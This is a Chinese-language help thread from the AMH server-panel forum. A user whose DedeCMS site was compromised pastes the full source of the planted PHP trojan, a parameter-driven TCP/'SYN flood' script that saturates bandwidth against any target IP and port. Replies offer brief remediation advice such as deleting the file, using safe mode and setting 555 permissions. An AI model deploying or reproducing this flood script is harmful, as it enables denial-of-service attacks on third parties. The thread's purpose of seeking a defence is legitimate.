HTTP
AMH 社区首页
AMH社区 - 开放自由有价值的社区
|
|
|---|---|
|
pc10201 |
pc10201 发表于 2014-01-20 16:09:46
服务器装有amh,然后iptables加了规则禁用了php木马对外发udp数据,但现在有木马发tcp数据包,然后服务器带宽就卡死了~
php木马如下: <?php ini_set("display_errors", "Off"); $packets = 0; $ip = $_REQUEST['ip']; $port = $_REQUEST['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_REQUEST['time']; $time = time(); print "状态 : 正常运行中.....<br>"; $max_time = $time+$exec_time; while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0); } echo "================================================<br>"; echo " <font color=blue>www.baidu.com<br>"; echo " SYN Flood 模块<br>"; echo " 作者:ybhacker<br>"; echo " 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>"; echo "================================================<br><br>"; echo " 攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>"; echo " 攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>"; echo " 攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>"; echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; ?> 如何防范,在不禁用任何php函数的情况下?
2014-01-20 16:09:46 1
|
|
com |
不是dedecms吧?
回复
2014-01-20 19:53:12 2
|
|
tanyuxiang |
别用织梦 硬要用就想办法补洞了
回复
2014-01-21 10:31:35 3
|
|
pc10201 |
引用: com 发表于 2014-1-20 19:53  不是dedecms吧? 是的~~~~~~~~~~~~~
回复
2014-01-22 17:18:54 4
|
|
com |
引用: pc10201 发表于 2014-1-22 17:18 是的~~~~~~~~~~~~~ 删除木马。 切换到安全模式。 全部目录文件重写成555权限。:lol
回复
2014-01-22 19:31:35 5
|
[求助帖]
中了php木马怎么办?
